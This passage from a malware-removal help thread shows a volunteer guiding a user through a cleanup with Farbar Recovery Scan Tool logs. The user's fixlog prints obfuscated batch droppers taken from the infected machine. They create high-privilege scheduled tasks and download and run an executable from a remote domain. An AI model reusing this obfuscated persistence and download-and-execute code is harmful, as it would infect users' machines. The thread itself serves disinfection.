Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (01/10/2018 03:00:22 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.


System errors:
=============
Error: (01/10/2018 09:46:36 PM) (Source: EventLog) (EventID: 6008) (User: )
Description: The previous system shutdown at 21:45:24 on 10.01.2018 was unexpected.

Error: (01/10/2018 03:38:41 PM) (Source: EventLog) (EventID: 6008) (User: )
Description: The previous system shutdown at 15:36:22 on 10.01.2018 was unexpected.

Error: (01/10/2018 07:46:35 AM) (Source: EventLog) (EventID: 6008) (User: )
Description: The previous system shutdown at 7:12:32 on 10.01.2018 was unexpected.

Error: (01/10/2018 03:48:35 AM) (Source: EventLog) (EventID: 6008) (User: )
Description: The previous system shutdown at 3:47:31 on 10.01.2018 was unexpected.

Error: (01/10/2018 03:00:16 AM) (Source: volsnap) (EventID: 25) (User: )
Description: The shadow copies of volume C: were deleted because the shadow copy storage could not grow in time.  Consider reducing the IO load on the system or choose a shadow copy storage volume that is not being shadow copied.

Error: (01/10/2018 02:59:31 AM) (Source: BugCheck) (EventID: 1001) (User: )
Description: The computer has rebooted from a bugcheck.  The bugcheck was: 0x000000f4 (0x0000000000000003, 0xfffffa8018c2db10, 0xfffffa8018c2ddf0, 0xfffff800035d08c0). A dump was saved in: C:\Windows\MEMORY.DMP. Report Id: 011018-10389-01.

Error: (01/10/2018 02:59:19 AM) (Source: EventLog) (EventID: 6008) (User: )
Description: The previous system shutdown at 2:57:39 on 10.01.2018 was unexpected.

Error: (01/07/2018 01:54:30 PM) (Source: Ntfs) (EventID: 55) (User: )
Description: The file system structure on the disk is corrupt and unusable.
Please run the chkdsk utility on the volume J:.

Error: (01/06/2018 04:50:28 PM) (Source: EventLog) (EventID: 6008) (User: )
Description: The previous system shutdown at 16:48:30 on 6.01.2018 was unexpected.

Error: (01/05/2018 05:20:09 PM) (Source: Ntfs) (EventID: 55) (User: )
Description: The file system structure on the disk is corrupt and unusable.
Please run the chkdsk utility on the volume J:.


==================== Memory info ===========================

Processor: Intel® Core™ i5-2500K CPU @ 3.30GHz
Percentage of memory in use: 28%
Total physical RAM: 16342.25 MB
Available physical RAM: 11670.95 MB
Total Virtual: 32682.68 MB
Available Virtual: 27353.73 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:927.73 GB) (Free:778.85 GB) NTFS
Drive d: () (Fixed) (Total:935.18 GB) (Free:816.72 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 19.8 GB) (Disk ID: D0D1F2E9)

========================================================
Disk: 1 (MBR Code: Windows 7 or 8) (Size: 1863 GB) (Disk ID: D56E2658)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=927.7 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=935.2 GB) - (Type=07 NTFS)

==================== End of Addition.txt ============================




#2 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,474 posts
  • Gender:Male
  • Local time:01:32 PM

Posted 11 January 2018 - 08:17 AM

Hi Xaltotun :)

My name is Aura and I'll be assisting you with your malware issue. Since we'll be working together, you can call me Aura or Yoan, which is my real name; it's up to you! Now that we've broken the ice, I'll just ask you a few things during the time we'll be working together to clean your system and get it back to an operational state.
  • As you'll notice, the logs we are asking for here are quite lengthy, so it's normal for me to not reply exactly after you post them. This is because I need some time to analyse them and then act accordingly. However, I'll always reply within 24 hours, 48 hours at most if something unexpected happens
  • As long as I'm assisting you on BleepingComputer, in this thread, I'll ask you to not seek assistance anywhere else for any issue related to the system we are working on. If you have an issue, question, etc. about your computer, please ask it in this thread and I'll assist you
  • The same principle applies to any modifications you make to your system, I would like you to ask me before you do any manipulations that aren't in the instructions I posted. This is to ensure that we are operating in sync and I know exactly what's happening on your system
  • If you aren't sure about an instruction I'm giving you, ask me about it. This is to ensure that the clean-up process goes without any issue. I'll answer you and even give you more precise instructions/explanations if you need. There's no shame in asking questions here, better be safe than sorry!
  • If you don't reply to your thread within 3 days, I'll bump this thread to let you know that I'm waiting for you. If you don't reply after 5 days, it'll be closed. If you return after that period, you can send me a PM to get it unlocked and we'll continue where we left off
  • Since malware can work quickly, we want to get rid of them as fast as we can, before they make unknown changes to the system. This being said, I would appreciate if you could reply to this thread within 24 hours of me posting. This way, we'll have a good clean-up rhythm and the chances of complications will be reduced
  • I'm against any form of pirated, illegal and counterfeit software and material. So if you have any installed on your system, I'll ask you to uninstall them right now. You don't have to tell me if you indeed had some or not, I'll give you the benefit of the doubt. Plus, this would be against BleepingComputer's rules
  • In the end, you are the one asking for assistance here. So if you wish to go a different way during the clean-up, like format and reinstall Windows, you are free to do so. I would appreciate it if you let me know about it first, and if you need, I can also assist you in the process
  • I would appreciate if you were to stay with me until the end, which means, until I declare your system clean. Just because your system isn't behaving weirdly anymore, or is running better than before, it doesn't mean that the infection is completely gone
    This being said, I have a full-time job so sometimes it'll take longer for me to reply to you. Don't worry, you'll be my first priority as soon as I get home and have time to look at your thread
This being said, it's time to clean up some malware, so let's get started, shall we? :)

Can you provide me the Malwarebytes and Zemana scan logs so I can see what was detected and deleted?

Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#3 Xaltotun

Xaltotun
  • Topic Starter

  • Members
  • 4 posts
  • Local time:07:32 PM

Posted 11 January 2018 - 10:44 AM

Today, just a few minutes ago, the CMD downloader started again...

Zemana log

Zemana AntiMalware 2.74.5.150 (paigaldatud)

-------------------------------------------------------
Scan Result            : Lõpetatud
Scan Date              : 2018.1.10
Operating System       : Windows 7 64-bit
Processor              : 4X Intel® Core™ i5-2500K CPU @ 3.30GHz
BIOS Mode              : Legacy
CUID                   : 12329C6AEADACA30E8731E
Scan Type              : Süsteemi kontroll
Duration               : 8m 29s
Scanned Objects        : 65468
Detected Objects       : 5
Excluded Objects       : 0
Read Level             : SCSI
Auto Upload            : Sees
Detect All Extensions  : Väljas
Scan Documents         : Väljas
Domain Info            : WORKGROUP,0,2

Detected Objects
-------------------------------------------------------

wrc@avast.com
Status             : Kontrollitud
Object             : %appdata%\mozilla\firefox\profiles\krkz2nio.default-1500317088253\extensions\wrc@avast.com.xpi
MD5                : 904CC438CF06B7697F59FE962D612781
Publisher          : -
Size               : 707252
Version            : -
Detection          : PUA.FirefoxExt!Gr
Cleaning Action    : Paranda
Related Objects    :
                Brauseri lisa - wrc@avast.com
                Fail - %appdata%\mozilla\firefox\profiles\krkz2nio.default-1500317088253\extensions\wrc@avast.com.xpi

installed-extensions
Status             : Kontrollitud
Object             : %appdata%\mozilla\firefox\profiles\krkz2nio.default-1500317088253\extensions\installed-extensions.txt
MD5                : BD9800DF63176DE7473D4EAE37DAFE10
Publisher          : -
Size               : 46
Version            : -
Detection          : PUA.FirefoxExt!Gr
Cleaning Action    : Paranda
Related Objects    :
                Brauseri lisa - installed-extensions
                Fail - %appdata%\mozilla\firefox\profiles\krkz2nio.default-1500317088253\extensions\installed-extensions.txt

extensions
Status             : Scanned
Object             : %appdata%\mozilla\firefox\profiles\krkz2nio.default-1500317088253\extensions\extensions.rdf
MD5                : 9C360CE33944BC994AD7A89A70C97FAA
Publisher          : -
Size               : 2747
Version            : -
Detection          : PUA.FirefoxExt!Gr
Cleaning Action    : Repair
Related Objects    :
                Browser add-on - extensions
                File - %appdata%\mozilla\firefox\profiles\krkz2nio.default-1500317088253\extensions\extensions.rdf

svchost.exe
Status             : Scanned
Object             : %systemroot%\syswow64\svchost.exe
MD5                : 54A47F6B5E09A77E61649109C6A08866
Publisher          : Microsoft Windows
Size               : 20992
Version            : 6.1.7600.16385
Detection          : Modified process
Cleaning Action    : Repair
Related Objects    :
                Process - 2888 - C:\Windows\SysWOW64\svchost.exe
                File - %systemroot%\syswow64\svchost.exe

mail.ru
Status             : Scanned
Object             : NE->c:\programdata\mail.ru
MD5                : -
Publisher          : -
Size               : -
Version            : -
Detection          : PUA:Win32/Mail.Ru.B!Neng
Cleaning Action    : Quarantine
Related Objects    :
                (null) - (null)


Cleaning Result
-------------------------------------------------------
Cleaned               : 5
Reported as safe      : 0
Failed                : 0
Malwarebytes
www.malwarebytes.com

-Log Details-
Scan Date: 1/10/18
Scan Time: 2:41 AM
Log File: f6253130-f59e-11e7-aa12-902b34d857a5.json
Administrator: Yes

-Software Information-
Version: 3.3.1.2183
Components Version: 1.0.262
Update Package Version: 1.0.3661
License: Free

-System Information-
OS: Windows 7 Service Pack 1
CPU: x64
File System: NTFS
User: Jahikas-Reaktor\Jahikas

-Scan Summary-
Scan Type: Threat Scan
Result: Completed
Objects Scanned: 259608
Threats Detected: 13
Threats Quarantined: 13
Time Elapsed: 15 min, 55 sec

-Scan Options-
Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Enabled
Heuristics: Enabled
PUP: Detect
PUM: Detect

-Scan Details-
Process: 0
(No malicious items detected)

Module: 0
(No malicious items detected)

Registry Key: 4
PUP.Optional.StartPage, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\DZOPERCOMJHAR, Quarantined, [39], [475864],1.0.3661
PUP.Optional.StartPage, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{069442D4-A8D4-4DF7-829E-E8C67A418655}, Quarantined, [39], [475864],1.0.3661
PUP.Optional.StartPage, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\PLAIN\{069442D4-A8D4-4DF7-829E-E8C67A418655}, Quarantined, [39], [475864],1.0.3661
PUP.Optional.MailRu, HKU\S-1-5-21-1345210596-781569937-2744199837-1000\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{FFEBBF0A-C22C-4172-89FF-45215A135AC7}, Quarantined, [633], [382913],1.0.3661

Registry Value: 4
PUP.Optional.MailRu, HKU\S-1-5-21-1345210596-781569937-2744199837-1000\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{FFEBBF0A-C22C-4172-89FF-45215A135AC7}|URL, Quarantined, [633], [382913],1.0.3661
PUP.Optional.MailRu, HKU\S-1-5-21-1345210596-781569937-2744199837-1000\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{FFEBBF0A-C22C-4172-89FF-45215A135AC7}|FAVICONURLFALLBACK, Quarantined, [633], [382913],1.0.3661
PUP.Optional.MailRu, HKU\S-1-5-21-1345210596-781569937-2744199837-1000\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{FFEBBF0A-C22C-4172-89FF-45215A135AC7}|SUGGESTIONSURL, Quarantined, [633], [382913],1.0.3661
PUP.Optional.StartPage, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{069442D4-A8D4-4DF7-829E-E8C67A418655}|PATH, Quarantined, [39], [475863],1.0.3661

Registry Data: 0
(No malicious items detected)

Data Stream: 0
(No malicious items detected)

Folder: 0
(No malicious items detected)

File: 5
PUP.Optional.MailRu, C:\USERS\JAHIKAS\FAVORITES\Mail.Ru Агент - используй для общения!.url, Quarantined, [633], [471428],1.0.3661
PUP.Optional.MailRu, C:\USERS\JAHIKAS\FAVORITES\Mail.Ru.url, Quarantined, [633], [471428],1.0.3661
PUP.Optional.StartPage, C:\WINDOWS\SYSTEM32\TASKS\DZOPERCOMJHAR, Quarantined, [39], [475864],1.0.3661
Adware.FileTour, C:\USERS\JAHIKAS\APPDATA\LOCAL\TEMP\IS-3GASI.TMP\F9BC8B9F, Quarantined, [149], [413261],1.0.3661
Adware.FileTour, C:\USERS\JAHIKAS\APPDATA\LOCAL\TEMP\IS-3GASI.TMP\776326A5, Quarantined, [149], [423225],1.0.3661

Physical Sector: 0
(No malicious items detected)


(end)



#4 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,474 posts
  • OFFLINE
  • Gender:Male
  • Local time:01:32 PM

Posted 11 January 2018 - 11:26 AM

Alright follow the instructions below.

Farbar Recovery Scan Tool (FRST) - Fix mode
Follow the instructions below to execute a fix on your system using FRST, and provide the log in your next reply.
  • Download the attached fixlist.txt file, and save it on your Desktop (or wherever your FRST.exe/FRST64.exe executable is located)
  • Right-click on the FRST executable and select Run as Administrator (for Windows Vista, 7, 8, 8.1 and 10 users)
  • Click on the Fix button
  • On completion, a message will come up saying that the fix has been completed and it'll open a log in Notepad
  • Copy and paste its content in your next reply

Attached Files


Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#5 Xaltotun

Xaltotun
  • Topic Starter

  • Members
  • 4 posts
  • OFFLINE
  • Local time:07:32 PM

Posted 11 January 2018 - 11:38 AM

After it was done, the computer restarted...

Fixlog here


Fix result of Farbar Recovery Scan Tool (x64) Version: 02.01.2018
Ran by Jahikas (11-01-2018 18:29:36) Run:1
Running from C:\Users\Jahikas\Desktop\FRST
Loaded Profiles: Jahikas & UpdatusUser (Available Profiles: Jahikas & UpdatusUser)
Boot Mode: Normal
==============================================

fixlist content:
*****************
CloseProcesses:
CreateRestorePoint:

cmd: type "C:\Program Files (x86)\HXFiYSAfe"
cmd: type "C:\Program Files (x86)\HXFiYSAfe.bat"
cmd: type "C:\Program Files (x86)\bFmsiuYoOoOvL"
cmd: type "C:\Program Files (x86)\bFmsiuYoOoOvL.bat"
cmd: type "C:\Users\Jahikas\AppData\Roaming\YoEb"
cmd: type "C:\Users\Jahikas\AppData\Roaming\YoEb.bat"
cmd: type "C:\Windows\SysWOW64\hicAAmW"
cmd: type "C:\Windows\SysWOW64\hicAAmW.bat"

HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION

Task: {6C430DDE-4ADF-4922-B91E-872CCAC5D507} - System32\Tasks\PSEWDZ => C:\Users\Jahikas\oFIF.exe [2016-06-12] (Microsoft Corporation)
Task: {85FB7A0B-0200-4CF4-A545-AA1C0CBF65A3} - System32\Tasks\SyHTyUPcnUkIY => C:\Program Files (x86)\bFmsiuYoOoOvL.bat [2009-07-14] () <==== ATTENTION
Task: {98C651FF-B20D-4DAE-8C2B-75BC6AB62AC0} - System32\Tasks\hYOuioDYluo => C:\Windows\SysWOW64\hicAAmW.bat [2009-07-14] () <==== ATTENTION

C:\Program Files (x86)\HXFiYSAfe
C:\Program Files (x86)\HXFiYSAfe.bat
C:\Program Files (x86)\bFmsiuYoOoOvL
C:\Program Files (x86)\bFmsiuYoOoOvL.bat
C:\Users\Jahikas\oFIF.exe
C:\Users\Jahikas\AppData\Local\WMI.ini
C:\Users\Jahikas\AppData\Roaming\YoEb
C:\Users\Jahikas\AppData\Roaming\YoEb.bat
C:\Windows\SysWOW64\Yugjm.exe
C:\Windows\SysWOW64\hicAAmW
C:\Windows\SysWOW64\hicAAmW.bat

EmptyTemp:
*****************

Processes closed successfully.
Restore point was successfully created.

========= type "C:\Program Files (x86)\HXFiYSAfe" =========

@ech%OiYDupYT%o o%ZIaAqpUFEoEe%ff
copy /y "C:\Us%capAZF%ers\Jahikas\App%YzoMGeezFI%Da%IKAXie%ta\%aUwWMIUY%R%eGEoaIaeOIxsU%oam%DEyUtm%ing\YoE%uzqaX%b" "C:\Users\Ja%OIYUVzybkvU%hikas\Ap%aaPaomobltt%pData\Roaming\YoEb.ba%yiaQsaY%t"
copy /y "C:\Program Files (x8%yofaeerEUU%6)\bFmsiuYoOoOv%ibWOL%L" "C:\Program Files (x8%qiKuyeeVfp%6)\%KaueDYAuo%bFmsiuYoOoOvL.bat"
schtasks /%qouWi%create /tn "S%ifbjVG%yHTyUPcnUkI%oiAtLAU%Y" /tr "'C:\P%IwoKSosYcTOU%rogram Files (x86)\bFmsiuYoOoOvL%PErG%.bat%peSUYZTcyOO%' " /sc ONL%iSeYiYuYK%OGON /delay 0003:00 /rl high%saiuYMYi%est /f
set ruHIoeIc%yrIO%EziF=%rAnDOm%%RaNdOM%
"C:\Windows\S%eyIO%ysWOW64\Yugjm.exe%aiUryAu%" /TRa%NOuvieYRI%nsFER GzEUM /Do%ULEeYauScQoH%WNLoaD /priOrITy higH http://simstrackin%DyTZbiy%g.info%HAOyIXo%/2ecsavvx52qm.zip "C:\U%SGsaBbwIS%ser%aEoF%s\Jahik%kxYa%as\AppData\L%FTNq%ocal\Temp\uqVyaatI%meyU%urrBUYNGO%.zip"
renam%RTfue%e "C:\Users\Jah%lANu%ikas\App%VoEEPEtqeyoGa%Dat%lWQhRMq%a\Local\Temp\uqVyaatIurrB.zip" %ruHIoeIcEziF%.exe
cmd /c "%OYOjMITRoYxy%"C%XodhjrsHw%:\Us%PaevhiPaDu%ers\Jahikas\AppDat%UnutU%a\Lo%zAUAKiUAqRs%cal\Temp\%ruHIoeIcEziF%.exe" i"
========= End of CMD: =========


========= type "C:\Program Files (x86)\HXFiYSAfe.bat" =========

@ech%OiYDupYT%o o%ZIaAqpUFEoEe%ff
copy /y "C:\Us%capAZF%ers\Jahikas\App%YzoMGeezFI%Da%IKAXie%ta\%aUwWMIUY%R%eGEoaIaeOIxsU%oam%DEyUtm%ing\YoE%uzqaX%b" "C:\Users\Ja%OIYUVzybkvU%hikas\Ap%aaPaomobltt%pData\Roaming\YoEb.ba%yiaQsaY%t"
copy /y "C:\Program Files (x8%yofaeerEUU%6)\bFmsiuYoOoOv%ibWOL%L" "C:\Program Files (x8%qiKuyeeVfp%6)\%KaueDYAuo%bFmsiuYoOoOvL.bat"
schtasks /%qouWi%create /tn "S%ifbjVG%yHTyUPcnUkI%oiAtLAU%Y" /tr "'C:\P%IwoKSosYcTOU%rogram Files (x86)\bFmsiuYoOoOvL%PErG%.bat%peSUYZTcyOO%' " /sc ONL%iSeYiYuYK%OGON /delay 0003:00 /rl high%saiuYMYi%est /f
set ruHIoeIc%yrIO%EziF=%rAnDOm%%RaNdOM%
"C:\Windows\S%eyIO%ysWOW64\Yugjm.exe%aiUryAu%" /TRa%NOuvieYRI%nsFER GzEUM /Do%ULEeYauScQoH%WNLoaD /priOrITy higH http://simstrackin%DyTZbiy%g.info%HAOyIXo%/2ecsavvx52qm.zip "C:\U%SGsaBbwIS%ser%aEoF%s\Jahik%kxYa%as\AppData\L%FTNq%ocal\Temp\uqVyaatI%meyU%urrBUYNGO%.zip"
renam%RTfue%e "C:\Users\Jah%lANu%ikas\App%VoEEPEtqeyoGa%Dat%lWQhRMq%a\Local\Temp\uqVyaatIurrB.zip" %ruHIoeIcEziF%.exe
cmd /c "%OYOjMITRoYxy%"C%XodhjrsHw%:\Us%PaevhiPaDu%ers\Jahikas\AppDat%UnutU%a\Lo%zAUAKiUAqRs%cal\Temp\%ruHIoeIcEziF%.exe" i"
========= End of CMD: =========


========= type "C:\Program Files (x86)\bFmsiuYoOoOvL" =========

start /min cmd /c "C:\Users\Jahikas\AppData\Roaming\YoEb.bat"
exit
========= End of CMD: =========


========= type "C:\Program Files (x86)\bFmsiuYoOoOvL.bat" =========

start /min cmd /c "C:\Users\Jahikas\AppData\Roaming\YoEb.bat"
exit
========= End of CMD: =========


========= type "C:\Users\Jahikas\AppData\Roaming\YoEb" =========

@e%KrquPaUyO%cho off
copy /y "C:\Program F%bAHuYXeCY%iles (x86)\HX%BUBH%F%QoYUGx%iYSAfe" "C:\Pr%RXoZzNXOuRcDy%ogram Files (x86)\HX%oaIDUeixYny%FiYSAf%eEUU%e.bat%XMoiu%" YOeORql%
copy /y "C:\Win%BEymO%dows\S%lIYyzWUAuOyiq%ysWOW64%cYyOGoa%\hicA%OiePceUYESEi%AmW%YsuTKaizKh%" "C:\Win%lXyyyzoSDg%dows\Sys%etiQoOQEuXYoC%WO%YjEh%W64\%IoOaXHEPyEA%hicA%oLsuCAaEyAhju%Am%kuNoIYqUIi%W.%MOIuIwI%bat"%OYYQ%
s%NjEoo%ch%kkOaXihAOEed%tasks /create /tn "hYOuioDYl%InyMOOIYwa%u௮w%o" /tr "'%icfHYE%C:\Wi%EIPOE%ndows\SysWOW64\hicAAmW.%YauteUiIQE%bat' " /sc minute /mo 180 /rl high%YbthYO%est /f
set YHGOowNAaueee=%raNdOm%%rAnDoM%
"%bcyoIax%C:\W%kkyAowu%indows\S%OcYxaY%ysWOW64\Yugj%vytoD%m%aAuUIIQrztoNZ%.ex%KcAXqEVyo%e%ebcauaSVet%" /TrAnSfer d%agoLnxOmH%yEF /%EyAUjLO%dowNLOad /prIOrITY hIGh http://sim%rWObnyeaIt%s%WIMrifXBeEC%tracking.info/2ecsav%auiuaOUiQAg%vx52qm.zip "C:\Users\Jahikas\AppData\Local\Te%WokiuoI%mp\TaE%BrkR%XQ.zip"
rename "C:\Users\Jahikas\AppData\Loc%yyUzEIzdTBa%al%iAYFStDa%\Temp\TaEXQ.zip" %YHGOowNAaueee%.exe
cmd /%uYyTEOiTduA%c ""C:\User IKYEAuUeIlw%s\Jahikas\%xApy%AppData\L%yCujaJiIi%o%yeUEaUk%cal\TemÚIEULMOE%p\%YHGOowNAaueee%.exe" i"
========= End of CMD: =========


========= type "C:\Users\Jahikas\AppData\Roaming\YoEb.bat" =========

@e%KrquPaUyO%cho off
copy /y "C:\Program F%bAHuYXeCY%iles (x86)\HX%BUBH%F%QoYUGx%iYSAfe" "C:\Pr%RXoZzNXOuRcDy%ogram Files (x86)\HX%oaIDUeixYny%FiYSAf%eEUU%e.bat%XMoiu%" YOeORql%
copy /y "C:\Win%BEymO%dows\S%lIYyzWUAuOyiq%ysWOW64%cYyOGoa%\hicA%OiePceUYESEi%AmW%YsuTKaizKh%" "C:\Win%lXyyyzoSDg%dows\Sys%etiQoOQEuXYoC%WO%YjEh%W64\%IoOaXHEPyEA%hicA%oLsuCAaEyAhju%Am%kuNoIYqUIi%W.%MOIuIwI%bat"%OYYQ%
s%NjEoo%ch%kkOaXihAOEed%tasks /create /tn "hYOuioDYl%InyMOOIYwa%u௮w%o" /tr "'%icfHYE%C:\Wi%EIPOE%ndows\SysWOW64\hicAAmW.%YauteUiIQE%bat' " /sc minute /mo 180 /rl high%YbthYO%est /f
set YHGOowNAaueee=%raNdOm%%rAnDoM%
"%bcyoIax%C:\W%kkyAowu%indows\S%OcYxaY%ysWOW64\Yugj%vytoD%m%aAuUIIQrztoNZ%.ex%KcAXqEVyo%e%ebcauaSVet%" /TrAnSfer d%agoLnxOmH%yEF /%EyAUjLO%dowNLOad /prIOrITY hIGh http://sim%rWObnyeaIt%s%WIMrifXBeEC%tracking.info/2ecsav%auiuaOUiQAg%vx52qm.zip "C:\Users\Jahikas\AppData\Local\Te%WokiuoI%mp\TaE%BrkR%XQ.zip"
rename "C:\Users\Jahikas\AppData\Loc%yyUzEIzdTBa%al%iAYFStDa%\Temp\TaEXQ.zip" %YHGOowNAaueee%.exe
cmd /%uYyTEOiTduA%c ""C:\User IKYEAuUeIlw%s\Jahikas\%xApy%AppData\L%yCujaJiIi%o%yeUEaUk%cal\TemÚIEULMOE%p\%YHGOowNAaueee%.exe" i"
========= End of CMD: =========


========= type "C:\Windows\SysWOW64\hicAAmW" =========

start /min cmd /c "C:\Program Files (x86)\HXFiYSAfe.bat"
exit
========= End of CMD: =========


========= type "C:\Windows\SysWOW64\hicAAmW.bat" =========

start /min cmd /c "C:\Program Files (x86)\HXFiYSAfe.bat"
exit
========= End of CMD: =========

"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" => removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{6C430DDE-4ADF-4922-B91E-872CCAC5D507} => could not remove key. ErrorCode1: 0x00000002
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{6C430DDE-4ADF-4922-B91E-872CCAC5D507}" => removed successfully
C:\Windows\System32\Tasks\PSEWDZ => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\PSEWDZ" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{85FB7A0B-0200-4CF4-A545-AA1C0CBF65A3}" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{85FB7A0B-0200-4CF4-A545-AA1C0CBF65A3}" => removed successfully
C:\Windows\System32\Tasks\SyHTyUPcnUkIY => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SyHTyUPcnUkIY" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{98C651FF-B20D-4DAE-8C2B-75BC6AB62AC0}" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{98C651FF-B20D-4DAE-8C2B-75BC6AB62AC0}" => removed successfully
C:\Windows\System32\Tasks\hYOuioDYluo => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\hYOuioDYluo" => removed successfully
C:\Program Files (x86)\HXFiYSAfe => moved successfully
C:\Program Files (x86)\HXFiYSAfe.bat => moved successfully
C:\Program Files (x86)\bFmsiuYoOoOvL => moved successfully
C:\Program Files (x86)\bFmsiuYoOoOvL.bat => moved successfully
C:\Users\Jahikas\oFIF.exe => moved successfully
C:\Users\Jahikas\AppData\Local\WMI.ini => moved successfully
C:\Users\Jahikas\AppData\Roaming\YoEb => moved successfully
C:\Users\Jahikas\AppData\Roaming\YoEb.bat => moved successfully
C:\Windows\SysWOW64\Yugjm.exe => moved successfully
C:\Windows\SysWOW64\hicAAmW => moved successfully
C:\Windows\SysWOW64\hicAAmW.bat => moved successfully

=========== EmptyTemp: ==========

BITS transfer queue => 8388608 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 177571268 B
Java, Flash, Steam htmlcache => 2277 B
Windows/system/drivers => 81608120 B
Edge => 0 B
Chrome => 0 B
Firefox => 932947817 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Users => 0 B
Default => 0 B
Public => 0 B
ProgramData => 0 B
systemprofile => 16802 B
systemprofile32 => 66228 B
LocalService => 0 B
NetworkService => 0 B
Jahikas => 776525812 B
UpdatusUser => 0 B

RecycleBin => 0 B
EmptyTemp: => 1.8 GB temporary data Removed.

================================


The system needed a reboot.

==== End of Fixlog 18:30:05 ====



#6 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,474 posts
  • OFFLINE
  • Gender:Male
  • Local time:01:32 PM

Posted 11 January 2018 - 11:44 AM

Good! Did you get any CMD prompts on startup?



#7 Xaltotun

Xaltotun
  • Topic Starter

  • Members
  • 4 posts
  • OFFLINE
  • Local time:07:32 PM

Posted 11 January 2018 - 11:49 AM

No, I'll let you know if it comes..

I'm very grateful for the help, thank you very much :)



#8 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,474 posts
  • OFFLINE
  • Gender:Male
  • Local time:01:32 PM

Posted 11 January 2018 - 01:02 PM

No problem Xaltotun, you're welcome!

Since there are no signs of infection anymore in your logs, and you just told me that there are no more issues left to address, I guess we're done here. We'll wrap it up by running DelFix to delete the tools and logs that were used in this clean-up.

DelFix
Follow the instructions below to download and execute DelFix.
  • Download DelFix and move the executable to your Desktop
  • Right-click on DelFix.exe and select Run as Administrator (for Windows Vista, 7, 8, 8.1 and 10 users)
  • Check the following options :
    • Activate UAC
    • Remove disinfection tools
    • Create registry backup
    • Purge system restore
    • Reset system settings
  • Once all the options mentioned above are checked, click on Run
  • After DelFix is done running, a log will open. Please copy/paste the content of the output log in your next reply

Tips, tricks, advice and recommendations

Now it's time to give you some tips, tricks, advice and recommendations on how to protect your system and prevent you from being infected in the future. This is where I'll explain basic security measures that you should take to protect and harden your system, and also make sure it stays as safe and secure as possible against hackers and malware. You are free to ignore the recommendations listed below, although I obviously do not recommend it. If you have any questions about one of the points covered in the speech below, feel free to ask me your questions here directly so I can answer them and guide you.

Windows Updates

Keeping Windows up to date is one of the first steps in having a safe and secure system. The Security Updates that Windows receives are meant to fix exploits and flaws in it that make it more secure and not exploitable by hackers. In order to do that, you should always install the Security Updates, known as "Important Updates" on your Windows system. These updates are released on the second Tuesday of every month, but some are also released before if they are emergency/critical Security Updates. Let's make sure that you have all your Important Updates and Recommended Updates installed and that your Windows Updates are set to be installed automatically.

Keeping your programs up-to-date

Like keeping Windows updated, keeping your installed programs up-to-date is another important step in having a safe and secure system. Outdated programs can be exploited by hackers and malware to infect a system and take it over. This is especially true today with the rise of Exploit Kits (and also 0-days), which are one of the biggest attack vectors to distribute malware. Therefore, you should always keep vulnerable programs like Adobe Flash Player, Adobe Shockwave Player, Java, Silverlight, Google Chrome, Mozilla Firefox, VLC Media Player, etc. updated to their most recent version (even better, you don't have to install them if you don't use them). Programs like UCheck, SecuniaPSI and Heimdal Free will scan your system for outdated programs, and help you identify them, as well as update them.

Anti-Virus

